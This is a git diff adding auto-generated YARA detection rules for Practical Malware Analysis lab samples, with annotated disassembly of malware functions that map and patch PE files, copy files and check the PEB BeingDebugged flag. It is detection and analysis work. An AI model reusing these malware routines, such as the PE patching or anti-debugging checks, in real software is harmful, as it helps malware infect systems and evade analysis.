.text:0x004010d8 6a00 push 0 + .text:0x004010da 6a00 push 0 + .text:0x004010dc 681f000f00 push 0x000f001f + .text:0x004010e1 50 push eax + .text:0x004010e2 89442428 mov dword [esp + 40],eax + .text:0x004010e6 ff150c204000 call dword [0x0040200c] ;kernel32.MapViewOfFile(kernel32.CreateFileMappingA(<0x004010bb>,0,4,0,0,0),0x000f001f,0,0,0) + .text:0x004010ec 8bf0 mov esi,eax + .text:0x004010ee 85f6 test esi,esi + .text:0x004010f0 89742410 mov dword [esp + 16],esi + .text:0x004010f4 0f84db000000 jz 0x004011d5 + .text:0x004010fa 8b6e3c mov ebp,dword [esi + 60] + .text:0x004010fd 8b1d08204000 mov ebx,dword [0x00402008] + .text:0x00401103 03ee add ebp,esi + .text:0x00401105 6a04 push 4 + .text:0x00401107 55 push ebp + .text:0x00401108 ffd3 call ebx ;kernel32.IsBadReadPtr(0xa2bb7170,4) + .text:0x0040110a 85c0 test eax,eax + .text:0x0040110c 0f85c3000000 jnz 0x004011d5 + .text:0x00401112 817d0050450000 cmp dword [ebp],0x00004550 + .text:0x00401119 0f85b6000000 jnz 0x004011d5 + .text:0x0040111f 8b8d80000000 mov ecx,dword [ebp + 128] + .text:0x00401125 56 push esi + .text:0x00401126 55 push ebp + .text:0x00401127 51 push ecx + .text:0x00401128 e813ffffff call 0x00401040 ;sub_00401040(0x61616161,0xa2bb7170,kernel32.MapViewOfFile(<0x004010d0>,0x000f001f,0,0,0)) + .text:0x0040112d 83c40c add esp,12 + .text:0x00401130 8bf8 mov edi,eax + .text:0x00401132 6a14 push 20 + .text:0x00401134 57 push edi + .text:0x00401135 ffd3 call ebx ;kernel32.IsBadReadPtr(sub_00401040(0x61616161,0xa2bb7170,<0x004010e6>),20) + .text:0x00401137 85c0 test eax,eax + .text:0x00401139 0f8596000000 jnz 0x004011d5 + .text:0x0040113f 83c70c add edi,12 + .text:0x00401142 loc_00401142: [1 XREFS] + .text:0x00401142 8b47f8 mov eax,dword [edi - 8] + .text:0x00401145 897c2420 mov dword [esp + 32],edi + .text:0x00401149 85c0 test eax,eax + .text:0x0040114b 7505 jnz 0x00401152 + .text:0x0040114d 833f00 cmp dword [edi],0 + .text:0x00401150 745a jz 0x004011ac + .text:0x00401152 loc_00401152: [1 XREFS] + .text:0x00401152 8b17 mov edx,dword [edi] + .text:0x00401154 56 push esi + .text:0x00401155 55 push ebp + .text:0x00401156 52 push edx + .text:0x00401157 e8e4feffff call 0x00401040 ;sub_00401040(0x61616161,0xa2bb7170,<0x004010e6>) + .text:0x0040115c 83c40c add esp,12 + .text:0x0040115f 8bd8 mov ebx,eax + .text:0x00401161 6a14 push 20 + .text:0x00401163 53 push ebx + .text:0x00401164 ff1508204000 call dword [0x00402008] ;kernel32.IsBadReadPtr(sub_00401040(0x61616161,0xa2bb7170,<0x004010e6>),20) + .text:0x0040116a 85c0 test eax,eax + .text:0x0040116c 7567 jnz 0x004011d5 + .text:0x0040116e 6820304000 push 0x00403020 + .text:0x00401173 53 push ebx + .text:0x00401174 ff1564204000 call dword [0x00402064] ;msvcrt._stricmp(<0x00401157>,0x00403020) + .text:0x0040117a 83c408 add esp,8 + .text:0x0040117d 85c0 test eax,eax + .text:0x0040117f 7526 jnz 0x004011a7 + .text:0x00401181 8bfb mov edi,ebx + .text:0x00401183 83c9ff or ecx,0xffffffff + .text:0x00401186 f2ae repnz: scasb + .text:0x00401188 f7d1 not ecx + .text:0x0040118a 8bc1 mov eax,ecx + .text:0x0040118c be10304000 mov esi,0x00403010 + .text:0x00401191 8bfb mov edi,ebx + .text:0x00401193 c1e902 shr ecx,2 + .text:0x00401196 f3a5 rep: movsd + .text:0x00401198 8bc8 mov ecx,eax + .text:0x0040119a 83e103 and ecx,3 + .text:0x0040119d f3a4 rep: movsb + .text:0x0040119f 8b742410 mov esi,dword [esp + 16] + .text:0x004011a3 8b7c2420 mov edi,dword [esp + 32] + .text:0x004011a7 loc_004011a7: [1 XREFS] + .text:0x004011a7 83c714 add edi,20 + .text:0x004011aa eb96 jmp 0x00401142 + .text:0x004011ac loc_004011ac: [1 XREFS] + .text:0x004011ac 81c5d0000000 add ebp,208 + .text:0x004011b2 33c9 xor ecx,ecx + .text:0x004011b4 56 push esi + .text:0x004011b5 894d00 mov dword [ebp],ecx + .text:0x004011b8 894d04 mov dword [ebp + 4],ecx + .text:0x004011bb ff1504204000 call dword [0x00402004] ;kernel32.UnmapViewOfFile(<0x004010e6>) + .text:0x004011c1 8b542414 mov edx,dword [esp + 20] + .text:0x004011c5 8b3500204000 mov esi,dword [0x00402000] + .text:0x004011cb 52 push edx + .text:0x004011cc ffd6 call esi ;kernel32.CloseHandle(<0x004010d0>) + .text:0x004011ce 8b442418 mov eax,dword [esp + 24] + .text:0x004011d2 50 push eax + .text:0x004011d3 ffd6 call esi ;kernel32.CloseHandle(<0x004010bb>) + .text:0x004011d5 loc_004011d5: [5 XREFS] + .text:0x004011d5 5f pop edi + .text:0x004011d6 5e pop esi + .text:0x004011d7 5d pop ebp + .text:0x004011d8 5b pop ebx + .text:0x004011d9 83c40c add esp,12 + .text:0x004011dc c3 ret + */ + $c2 = { 83 EC 0C 53 8B 44 24 ?? 55 56 57 6A 00 6A 00 6A 03 6A 00 6A 01 68 00 00 00 10 50 FF 15 ?? ?? ?? ?? 6A 00 6A 00 6A 00 6A 04 6A 00 50 89 44 24 ?? FF 15 ?? ?? ?? ?? 6A 00 6A 00 6A 00 68 1F 00 0F 00 50 89 44 24 ?? FF 15 ?? ?? ?? ?? 8B F0 85 F6 89 74 24 ?? 0F 84 ?? ?? ?? ?? 8B 6E ?? 8B 1D ?? ?? ?? ?? 03 EE 6A 04 55 FF D3 85 C0 0F 85 ?? ?? ?? ?? 81 7D ?? 50 45 00 00 0F 85 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 56 55 51 E8 ?? ?? ?? ?? 83 C4 0C 8B F8 6A 14 57 FF D3 85 C0 0F 85 ?? ?? ?? ?? 83 C7 0C 8B 47 ?? 89 7C 24 ?? 85 C0 75 ?? 83 3F 00 74 ?? 8B 17 56 55 52 E8 ?? ?? ?? ?? 83 C4 0C 8B D8 6A 14 53 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 68 20 30 40 00 53 FF 15 ?? ?? ?? ?? 83 C4 08 85 C0 75 ?? 8B FB 83 C9 FF F2 AE F7 D1 8B C1 BE 10 30 40 00 8B FB C1 E9 02 F3 A5 8B C8 83 E1 03 F3 A4 8B 74 24 ?? 8B 7C 24 ?? 83 C7 14 EB ?? 81 C5 D0 00 00 00 33 C9 56 89 4D ?? 89 4D ?? FF 15 ?? ?? ?? ?? 8B 54 24 ?? 8B 35 ?? ?? ?? ?? 52 FF D6 8B 44 24 ?? 50 FF D6 5F 5E 5D 5B 83 C4 0C C3 } + /* +function at 0x00401000@bb7425b82141a1c0f7d60e5106676bb1 with 1 features: + - enumerate PE sections + .text:0x00401000 Segment: .text (4096 bytes) + .text:0x00401000 + .text:0x00401000 FUNC: int cdecl sub_00401000( int arg0, int arg1, ) [4 XREFS] + .text:0x00401000 + .text:0x00401000 Stack Variables: (offset from initial top of stack) + .text:0x00401000 8: int arg1 + .text:0x00401000 4: int arg0 + .text:0x00401000 + .text:0x00401000 8b542408 mov edx,dword [esp + 8] + .text:0x00401004 33c0 xor eax,eax + .text:0x00401006 33c9 xor ecx,ecx + .text:0x00401008 53 push ebx + .text:0x00401009 668b4214 mov ax,word [edx + 20] + .text:0x0040100d 668b4a06 mov cx,word [edx + 6] + .text:0x00401011 56 push esi + .text:0x00401012 33f6 xor esi,esi + .text:0x00401014 85c9 test ecx,ecx + .text:0x00401016 57 push edi + .text:0x00401017 8d441018 lea eax,dword [eax + edx + 24] + .text:0x0040101b 7e1c jle 0x00401039 + .text:0x0040101d 8b7c2410 mov edi,dword [esp + 16] + .text:0x00401021 loc_00401021: [1 XREFS] + .text:0x00401021 8b500c mov edx,dword [eax + 12] + .text:0x00401024 3bfa cmp edi,edx + .text:0x00401026 7209 jc 0x00401031 + .text:0x00401028 8b5808 mov ebx,dword [eax + 8] + .text:0x0040102b 03da add ebx,edx + .text:0x0040102d 3bfb cmp edi,ebx + .text:0x0040102f 720a jc 0x0040103b + .text:0x00401031 loc_00401031: [1 XREFS] + .text:0x00401031 46 inc esi + .text:0x00401032 83c028 add eax,40 + .text:0x00401035 3bf1 cmp esi,ecx + .text:0x00401037 7ce8 jl 0x00401021 + .text:0x00401039 loc_00401039: [1 XREFS] + .text:0x00401039 33c0 xor eax,eax + .text:0x0040103b loc_0040103b: [1 XREFS] + .text:0x0040103b 5f pop edi + .text:0x0040103c 5e pop esi + .text:0x0040103d 5b pop ebx + .text:0x0040103e c3 ret + */ + $c3 = { 8B 54 24 ?? 33 C0 33 C9 53 66 8B 42 ?? 66 8B 4A ?? 56 33 F6 85 C9 57 8D 44 10 ?? 7E ?? 8B 7C 24 ?? 8B 50 ?? 3B FA 72 ?? 8B 58 ?? 03 DA 3B FB 72 ?? 46 83 C0 28 3B F1 7C ?? 33 C0 5F 5E 5B C3 } + condition: + all of them +} + diff --git a/yara/expected_pma_03-04.exe_11-03.exe_16-01.exe b/yara/expected_pma_03-04.exe_11-03.exe_16-01.exe new file mode 100644 index 0000000..f75c521 --- /dev/null +++ b/yara/expected_pma_03-04.exe_11-03.exe_16-01.exe @@ -0,0 +1,6528 @@ +rule super_rule_18ec5 +{ + meta: + author = "CAPA Matches" + date_created = "2023-08-10" + date_modified = "2023-08-10" + description = "" + md5 = "18ec5becfa3991fb654e105bafbd5a4b" + strings: + /* +function at 0x004012d0@18ec5becfa3991fb654e105bafbd5a4b with 1 features: + - copy file + .text:0x004012d0 + .text:0x004012d0 FUNC: int msfastcall sub_004012d0( int ecx, int edx, ) [2 XREFS] + .text:0x004012d0 + .text:0x004012d0 Stack Variables: (offset from initial top of stack) + .text:0x004012d0 -264: int local264 + .text:0x004012d0 + .text:0x004012d0 55 push ebp + .text:0x004012d1 8bec mov ebp,esp + .text:0x004012d3 81ec04010000 sub esp,260 + .text:0x004012d9 6a00 push 0 + .text:0x004012db 68b8914000 push 0x004091b8 + .text:0x004012e0 68a8914000 push 0x004091a8 + .text:0x004012e5 ff151c804000 call dword [0x0040801c] ;kernel32.CopyFileA(0x004091a8,0x004091b8,0) + .text:0x004012eb 689c914000 push 0x0040919c + .text:0x004012f0 6884914000 push 0x00409184 + .text:0x004012f5 8d85fcfeffff lea eax,dword [ebp - 260] + .text:0x004012fb 50 push eax + .text:0x004012fc e851010000 call 0x00401452 ;_sprintf(ecx,edx,local264,0x00409184,0x0040919c) + .text:0x00401301 83c40c add esp,12 + .text:0x00401304 8d8dfcfeffff lea ecx,dword [ebp - 260] + .text:0x0040130a 51 push ecx + .text:0x0040130b e860fdffff call 0x00401070 ;sub_00401070(local264) + .text:0x00401310 83c404 add esp,4 + .text:0x00401313 6874914000 push 0x00409174 + .text:0x00401318 e89f000000 call 0x004013bc ;sub_004013bc(sub_00401070(local264),edx,local264,0x00409174) + .text:0x0040131d 83c404 add esp,4 + .text:0x00401320 33c0 xor eax,eax + .text:0x00401322 8be5 mov esp,ebp + .text:0x00401324 5d pop ebp + .text:0x00401325 c3 ret + */ + $c0 = { 55 8B EC 81 EC 04 01 00 00 6A 00 68 B8 91 40 00 68 A8 91 40 00 FF 15 ?? ?? ?? ?? 68 9C 91 40 00 68 84 91 40 00 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 0C 8D 8D ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 04 68 74 91 40 00 E8 ?? ?? ?? ?? 83 C4 04 33 C0 8B E5 5D C3 } + /* +function at 0x00401070@18ec5becfa3991fb654e105bafbd5a4b with 3 features: + - enumerate PE sections + - get file size + - read file via mapping + .text:0x00401070 + .text:0x00401070 FUNC: int cdecl sub_00401070( int arg0, ) [2 XREFS] + .text:0x00401070 + .text:0x00401070 Stack Variables: (offset from initial top of stack) + .text:0x00401070 4: int arg0 + .text:0x00401070 -8: int local8 + .text:0x00401070 -12: int local12 + .text:0x00401070 -16: int local16 + .text:0x00401070 -20: int local20 + .text:0x00401070 -24: int local24 + .text:0x00401070 -28: int local28 + .text:0x00401070 -32: int local32 + .text:0x00401070 -36: int local36 + .text:0x00401070 -40: int local40 + .text:0x00401070 -44: int local44 + .text:0x00401070 -48: int local48 + .text:0x00401070 -52: int local52 + .text:0x00401070 + .text:0x00401070 55 push ebp + .text:0x00401071 8bec mov ebp,esp + .text:0x00401073 83ec30 sub esp,48 + .text:0x00401076 56 push esi + .text:0x00401077 57 push edi + .text:0x00401078 c745fc00000000 mov dword [ebp - 4],0 + .text:0x0040107f 6a00 push 0 + .text:0x00401081 6880000000 push 128 + .text:0x00401086 6a04 push 4 + .text:0x00401088 6a00 push 0 + .text:0x0040108a 6a01 push 1 + .text:0x0040108c 68000000c0 push 0xc0000000 + .text:0x00401091 8b4508 mov eax,dword [ebp + 8] + .text:0x00401094 50 push eax + .text:0x00401095 ff1518804000 call dword [0x00408018] ;kernel32.CreateFileA(arg0,0xc0000000,1,0,4,128,0) + .text:0x0040109b 8945d4 mov dword [ebp - 44],eax + .text:0x0040109e 837dd4ff cmp dword [ebp - 44],0xffffffff + .text:0x004010a2 7508 jnz 0x004010ac + .text:0x004010a4 83c8ff or eax,0xffffffff + .text:0x004010a7 e919020000 jmp 0x004012c5 + .text:0x004010ac loc_004010ac: [1 XREFS] + .text:0x004010ac 6a00 push 0 + .text:0x004010ae 8b4dd4 mov ecx,dword [ebp - 44] + .text:0x004010b1 51 push ecx + .text:0x004010b2 ff1514804000 call dword [0x00408014] ;kernel32.GetFileSize(kernel32.CreateFileA(arg0,0xc0000000,1,0,4,128,0),0) + .text:0x004010b8 8945f0 mov dword [ebp - 16],eax + .text:0x004010bb 6a00 push 0 + .text:0x004010bd 8b55f0 mov edx,dword [ebp - 16] + .text:0x004010c0 52 push edx + .text:0x004010c1 6a00 push 0 + .text:0x004010c3 6a04 push 4 + .text:0x004010c5 6a00 push 0 + .text:0x004010c7 8b45d4 mov eax,dword [ebp - 44] + .text:0x004010ca 50 push eax + .text:0x004010cb ff1510804000 call dword [0x00408010] ;kernel32.CreateFileMappingA(<0x00401095>,0,4,0,kernel32.GetFileSize(<0x00401095>,0),0) + .text:0x004010d1 8945f4 mov dword [ebp - 12],eax + .text:0x004010d4 837df4ff cmp dword [ebp - 12],0xffffffff + .text:0x004010d8 7512 jnz 0x004010ec + .text:0x004010da 8b4dd4 mov ecx,dword [ebp - 44] + .text:0x004010dd 51 push ecx + .text:0x004010de ff150c804000 call dword [0x0040800c] ;kernel32.CloseHandle(<0x00401095>) + .text:0x004010e4 83c8ff or eax,0xffffffff + .text:0x004010e7 e9d9010000 jmp 0x004012c5 + .text:0x004010ec loc_004010ec: [1 XREFS] + .text:0x004010ec 8b55f0 mov edx,dword [ebp - 16] + .text:0x004010ef 52 push edx + .text:0x004010f0 6a00 push 0 + .text:0x004010f2 6a00 push 0 + .text:0x004010f4 6a06 push 6 + .text:0x004010f6 8b45f4 mov eax,dword [ebp - 12] + .text:0x004010f9 50 push eax + .text:0x004010fa ff1508804000 call dword [0x00408008] ;kernel32.MapViewOfFile(kernel32.CreateFileMappingA(<0x00401095>,0,4,0,<0x004010b2>,0),6,0,0,<0x004010b2>) + .text:0x00401100 8945fc mov dword [ebp - 4],eax + .text:0x00401103 837dfc00 cmp dword [ebp - 4],0 + .text:0x00401107 7526 jnz 0x0040112f + .text:0x00401109 8b4dd4 mov ecx,dword [ebp - 44] + .text:0x0040110c 51 push ecx + .text:0x0040110d ff150c804000 call dword [0x0040800c] ;kernel32.CloseHandle(<0x00401095>) + .text:0x00401113 8b55f4 mov edx,dword [ebp - 12] + .text:0x00401116 52 push edx + .text:0x00401117 ff150c804000 call dword [0x0040800c] ;kernel32.CloseHandle(<0x004010cb>) + .text:0x0040111d 8b45fc mov eax,dword [ebp - 4] + .text:0x00401120 50 push eax + .text:0x00401121 ff1504804000 call dword [0x00408004] ;kernel32.UnmapViewOfFile(<0x004010fa>) + .text:0x00401127 83c8ff or eax,0xffffffff + .text:0x0040112a e996010000 jmp 0x004012c5 + .text:0x0040112f loc_0040112f: [1 XREFS] + .text:0x0040112f 8b4dfc mov ecx,dword [ebp - 4] + .text:0x00401132 894de8 mov dword [ebp - 24],ecx + .text:0x00401135 8b55e8 mov edx,dword [ebp - 24] + .text:0x00401138 8b45fc mov eax,dword [ebp - 4] + .text:0x0040113b 03423c add eax,dword [edx + 60] + .text:0x0040113e 8945dc mov dword [ebp - 36],eax + .text:0x00401141 8b4ddc mov ecx,dword [ebp - 36] + .text:0x00401144 33d2 xor edx,edx + .text:0x00401146 668b5114 mov dx,word [ecx + 20] + .text:0x0040114a 8b45dc mov eax,dword [ebp - 36] + .text:0x0040114d 8d4c1018 lea ecx,dword [eax + edx + 24] + .text:0x00401151 894df8 mov dword [ebp - 8],ecx + .text:0x00401154 8b55dc mov edx,dword [ebp - 36] + .text:0x00401157 33c0 xor eax,eax + .text:0x00401159 668b4206 mov ax,word [edx + 6] + .text:0x0040115d 50 push eax + .text:0x0040115e 8b4df8 mov ecx,dword [ebp - 8] + .text:0x00401161 51 push ecx + .text:0x00401162 e899feffff call 0x00401000 ;sub_00401000(0xa2bc12e9,0x00006161) + .text:0x00401167 83c408 add esp,8 + .text:0x0040116a 8945ec mov dword [ebp - 20],eax + .text:0x0040116d 837dec00 cmp dword [ebp - 20],0 + .text:0x00401171 7526 jnz 0x00401199 + .text:0x00401173 8b55d4 mov edx,dword [ebp - 44] + .text:0x00401176 52 push edx + .text:0x00401177 ff150c804000 call dword [0x0040800c] ;kernel32.CloseHandle(<0x00401095>) + .text:0x0040117d 8b45f4 mov eax,dword [ebp - 12] + .text:0x00401180 50 push eax + .text:0x00401181 ff150c804000 call dword [0x0040800c] ;kernel32.CloseHandle(<0x004010cb>) + .text:0x00401187 8b4dfc mov ecx,dword [ebp - 4] + .text:0x0040118a 51 push ecx + .text:0x0040118b ff1504804000 call dword [0x00408004] ;kernel32.UnmapViewOfFile(<0x004010fa>) + .text:0x00401191 83c8ff or eax,0xffffffff + .text:0x00401194 e92c010000 jmp 0x004012c5 + .text:0x00401199 loc_00401199: [1 XREFS] + .text:0x00401199 8b55dc mov edx,dword [ebp - 36] + .text:0x0040119c 837a2800 cmp dword [edx + 40],0 + .text:0x004011a0 7508 jnz 0x004011aa + .text:0x004011a2 83c8ff or eax,0xffffffff + .text:0x004011a5 e91b010000 jmp 0x004012c5 + .text:0x004011aa loc_004011aa: [1 XREFS] + .text:0x004011aa 8b45ec mov eax,dword [ebp - 20] + .text:0x004011ad 8178103a010000 cmp dword [eax + 16],314 + .text:0x004011b4 7708 ja 0x004011be + .text:0x004011b6 83c8ff or eax,0xffffffff + .text:0x004011b9 e907010000 jmp 0x004012c5 + .text:0x004011be loc_004011be: [1 XREFS] + .text:0x004011be 8b4dec mov ecx,dword [ebp - 20] + .text:0x004011c1 8b55ec mov edx,dword [ebp - 20] + .text:0x004011c4 8b4110 mov eax,dword [ecx + 16] + .text:0x004011c7 2b4208 sub eax,dword [edx + 8] + .text:0x004011ca 8945e4 mov dword [ebp - 28],eax + .text:0x004011cd 817de43a010000 cmp dword [ebp - 28],314 + .text:0x004011d4 7308 jnc 0x004011de + .text:0x004011d6 83c8ff or eax,0xffffffff + .text:0x004011d9 e9e7000000 jmp 0x004012c5 + .text:0x004011de loc_004011de: [1 XREFS] + .text:0x004011de 8b4dec mov ecx,dword [ebp - 20] + .text:0x004011e1 8b5114 mov edx,dword [ecx + 20] + .text:0x004011e4 8b45ec mov eax,dword [ebp - 20] + .text:0x004011e7 035008 add edx,dword [eax + 8] + .text:0x004011ea 8955d8 mov dword [ebp - 40],edx + .text:0x004011ed c745e000000000 mov dword [ebp - 32],0 + .text:0x004011f4 eb09 jmp 0x004011ff + .text:0x004011f6 loc_004011f6: [1 XREFS] + .text:0x004011f6 8b4de0 mov ecx,dword [ebp - 32] + .text:0x004011f9 83c101 add ecx,1 + .text:0x004011fc 894de0 mov dword [ebp - 32],ecx + .text:0x004011ff loc_004011ff: [1 XREFS] + .text:0x004011ff 817de03a010000 cmp dword [ebp - 32],314 + .text:0x00401206 7374 jnc 0x0040127c + .text:0x00401208 8b55e0 mov edx,dword [ebp - 32] + .text:0x0040120b 33c0 xor eax,eax + .text:0x0040120d 8a8230904000 mov al,byte [edx + 0x00409030] + .text:0x00401213 83f878 cmp eax,120 + .text:0x00401216 755f jnz 0x00401277 + .text:0x00401218 8b4de0 mov ecx,dword [ebp - 32] + .text:0x0040121b 33d2 xor edx,edx + .text:0x0040121d 8a9131904000 mov dl,byte [ecx + 0x00409031] + .text:0x00401223 83fa56 cmp edx,86 + .text:0x00401226 754f jnz 0x00401277 + .text:0x00401228 8b45e0 mov eax,dword [ebp - 32] + .text:0x0040122b 33c9 xor ecx,ecx + .text:0x0040122d 8a8832904000 mov cl,byte [eax + 0x00409032] + .text:0x00401233 83f934 cmp ecx,52 + .text:0x00401236 753f jnz 0x00401277 + .text:0x00401238 8b55e0 mov edx,dword [ebp - 32] + .text:0x0040123b 33c0 xor eax,eax + .text:0x0040123d 8a8233904000 mov al,byte [edx + 0x00409033] + .text:0x00401243 83f812 cmp eax,18 + .text:0x00401246 752f jnz 0x00401277 + .text:0x00401248 8b4ddc mov ecx,dword [ebp - 36] + .text:0x0040124b 8b5128 mov edx,dword [ecx + 40] + .text:0x0040124e 8b45ec mov eax,dword [ebp - 20] + .text:0x00401251 035014 add edx,dword [eax + 20] + .text:0x00401254 8b4ddc mov ecx,dword [ebp - 36] + .text:0x00401257 2b512c sub edx,dword [ecx + 44] + .text:0x0040125a 8b45e0 mov eax,dword [ebp - 32] + .text:0x0040125d 8b4dd8 mov ecx,dword [ebp - 40] + .text:0x00401260 8d440104 lea eax,dword [ecx + eax + 4] + .text:0x00401264 2bd0 sub edx,eax + .text:0x00401266 8955d0 mov dword [ebp - 48],edx + .text:0x00401269 8b4de0 mov ecx,dword [ebp - 32] + .text:0x0040126c 8b55d0 mov edx,dword [ebp - 48] + .text:0x0040126f 899130904000 mov dword [ecx + 0x00409030],edx + .text:0x00401275 eb05 jmp 0x0040127c + .text:0x00401277 loc_00401277: [4 XREFS] + .text:0x00401277 e97affffff jmp 0x004011f6 + .text:0x0040127c loc_0040127c: [2 XREFS] + .text:0x0040127c 8b7dfc mov edi,dword [ebp - 4] + .text:0x0040127f 037dd8 add edi,dword [ebp - 40] + .text:0x00401282 b94e000000 mov ecx,78 + .text:0x00401287 be30904000 mov esi,0x00409030 + .text:0x0040128c f3a5 rep: movsd + .text:0x0040128e 66a5 movsd + .text:0x00401290 8b45ec mov eax,dword [ebp - 20] + .text:0x00401293 8b4dd8 mov ecx,dword [ebp - 40] + .text:0x00401296 2b4814 sub ecx,dword [eax + 20] + .text:0x00401299 8b55dc mov edx,dword [ebp - 36] + .text:0x0040129c 034a2c add ecx,dword [edx + 44] + .text:0x0040129f 8b45dc mov eax,dword [ebp - 36] + .text:0x004012a2 894828 mov dword [eax + 40],ecx + .text:0x004012a5 8b4dd4 mov ecx,dword [ebp - 44] + .text:0x004012a8 51 push ecx + .text:0x004012a9 ff150c804000 call dword [0x0040800c] ;kernel32.CloseHandle(<0x00401095>) + .text:0x004012af 8b55f4 mov edx,dword [ebp - 12] + .text:0x004012b2 52 push edx + .text:0x004012b3 ff150c804000 call dword [0x0040800c] ;kernel32.CloseHandle(<0x004010cb>) + .text:0x004012b9 8b45fc mov eax,dword [ebp - 4] + .text:0x004012bc 50 push eax + .text:0x004012bd ff1504804000 call dword [0x00408004] ;kernel32.UnmapViewOfFile(kernel32.MapViewOfFile(<0x004010cb>,6,0,0,<0x004010b2>)) + .text:0x004012c3 33c0 xor eax,eax + .text:0x004012c5 loc_004012c5: [7 XREFS] + .text:0x004012c5 5f pop edi + .text:0x004012c6 5e pop esi + .text:0x004012c7 8be5 mov esp,ebp + .text:0x004012c9 5d pop ebp + .text:0x004012ca c3 ret + */ + $c1 = { 55 8B EC 83 EC 30 56 57 C7 45 ?? 00 00 00 00 6A 00 68 80 00 00 00 6A 04 6A 00 6A 01 68 00 00 00 C0 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 89 45 ?? 83 7D ?? FF 75 ?? 83 C8 FF E9 ?? ?? ?? ?? 6A 00 8B 4D ?? 51 FF 15 ?? ?? ?? ?? 89 45 ?? 6A 00 8B 55 ?? 52 6A 00 6A 04 6A 00 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 89 45 ?? 83 7D ?? FF 75 ?? 8B 4D ?? 51 FF 15 ?? ?? ?? ?? 83 C8 FF E9 ?? ?? ?? ?? 8B 55 ?? 52 6A 00 6A 00 6A 06 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 89 45 ?? 83 7D ?? 00 75 ?? 8B 4D ?? 51 FF 15 ?? ?? ?? ?? 8B 55 ?? 52 FF 15 ?? ?? ?? ?? 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 83 C8 FF E9 ?? ?? ?? ?? 8B 4D ?? 89 4D ?? 8B 55 ?? 8B 45 ?? 03 42 ?? 89 45 ?? 8B 4D ?? 33 D2 66 8B 51 ?? 8B 45 ?? 8D 4C 10 ?? 89 4D ?? 8B 55 ?? 33 C0 66 8B 42 ?? 50 8B 4D ?? 51 E8 ?? ?? ?? ?? 83 C4 08 89 45 ?? 83 7D ?? 00 75 ?? 8B 55 ?? 52 FF 15 ?? ?? ?? ?? 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 8B 4D ?? 51 FF 15 ?? ?? ?? ?? 83 C8 FF E9 ?? ?? ?? ?? 8B 55 ?? 83 7A ?? 00 75 ?? 83 C8 FF E9 ?? ?? ?? ?? 8B 45 ?? 81 78 ?? 3A 01 00 00 77 ?? 83 C8 FF E9 ?? ?? ?? ?? 8B 4D ?? 8B 55 ?? 8B 41 ?? 2B 42 ?? 89 45 ?? 81 7D ?? 3A 01 00 00 73 ?? 83 C8 FF E9 ?? ?? ?? ?? 8B 4D ?? 8B 51 ?? 8B 45 ?? 03 50 ?? 89 55 ?? C7 45 ?? 00 00 00 00 EB ?? 8B 4D ?? 83 C1 01 89 4D ?? 81 7D ?? 3A 01 00 00 73 ?? 8B 55 ?? 33 C0 8A 82 ?? ?? ?? ?? 83 F8 78 75 ?? 8B 4D ?? 33 D2 8A 91 ?? ?? ?? ?? 83 FA 56 75 ?? 8B 45 ?? 33 C9 8A 88 ?? ?? ?? ?? 83 F9 34 75 ?? 8B 55 ?? 33 C0 8A 82 ?? ?? ?? ?? 83 F8 12 75 ?? 8B 4D ?? 8B 51 ?? 8B 45 ?? 03 50 ?? 8B 4D ?? 2B 51 ?? 8B 45 ?? 8B 4D ?? 8D 44 01 ?? 2B D0 89 55 ?? 8B 4D ?? 8B 55 ?? 89 91 ?? ?? ?? ?? EB ?? E9 ?? ?? ?? ?? 8B 7D ?? 03 7D ?? B9 4E 00 00 00 BE 30 90 40 00 F3 A5 66 A5 8B 45 ?? 8B 4D ?? 2B 48 ?? 8B 55 ?? 03 4A ?? 8B 45 ?? 89 48 ?? 8B 4D ?? 51 FF 15 ?? ?? ?? ?? 8B 55 ?? 52 FF 15 ?? ?? ?? ?? 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 33 C0 5F 5E 8B E5 5D C3 } + condition: + all of them +} + +rule super_rule_7faaf +{ + meta: + author = "CAPA Matches" + date_created = "2023-08-10" + date_modified = "2023-08-10" + description = "" + md5 = "7faafc7e4a5c736ebfee6abbbc812d80" + strings: + /* +Basic Block at 0x00401100@7faafc7e4a5c736ebfee6abbbc812d80 with 1 features: + - check for PEB BeingDebugged flag + .text:0x00401100 + .text:0x00401100 FUNC: int cdecl sub_00401100( ) [2 XREFS] + .text:0x00401100 + .text:0x00401100 Stack Variables: (offset from initial top of stack) + .text:0x00401100 -8: int local8 + .text:0x00401100 -12: int local12 + .text:0x00401100 -16: int local16 + .text:0x00401100 -20: int local20 + .text:0x00401100 -24: int local24 + .text:0x00401100 + .text:0x00401100 55 push ebp + .text:0x00401101 8bec mov ebp,esp + .text:0x00401103 83ec14 sub esp,20 + .text:0x00401106 53 push ebx + .text:0x00401107 56 push esi + .text:0x00401108 57 push edi + .text:0x00401109 c745f000000000 mov dword [ebp - 16],0 + .text:0x00401110 c745ec00000000 mov dword [ebp - 20],0 + .text:0x00401117 64a130000000 fs: mov eax,dword [0x00000030] + .text:0x0040111d 8a5802 mov bl,byte [eax + 2] + .text:0x00401120 885df4 mov byte [ebp - 12],bl + .text:0x00401123 0fbe45f4 movsx eax,byte [ebp - 12] + .text:0x00401127 85c0 test eax,eax + .text:0x00401129 7405 jz 0x00401130 + */ + $c2 = { 55 8B EC 83 EC 14 53 56 57 C7 45 ?? 00 00 00 00 C7 45 ?? 00 00 00 00 64 A1 ?? ?? ?? ?? 8A 58 ?? 88 5D ?? 0F BE 45 ?? 85 C0 74 ?? } + /* +Basic Block at 0x004011d0@7faafc7e4a5c736ebfee6abbbc812d80 with 1 features: + - check for PEB BeingDebugged flag + .text:0x004011d0 + .text:0x004011d0 FUNC: int cdecl sub_004011d0( int arg0, int arg1, int arg2, int arg3, ) [6 XREFS] + .text:0x004011d0 + .text:0x004011d0 Stack Variables: (offset from initial top of stack) + .text:0x004011d0 16: int arg3 + .text:0x004011d0 12: int arg2 + .text:0x004011d0 8: int arg1 + .text:0x004011d0 4: int arg0 + .text:0x004011d0 -8: int local8 + .text:0x004011d0 -4108: int local4108 + .text:0x004011d0 -4112: int local4112 + .text:0x004011d0 -4116: int local4116 + .text:0x004011d0 -4120: int local4120 + .text:0x004011d0 -4124: int 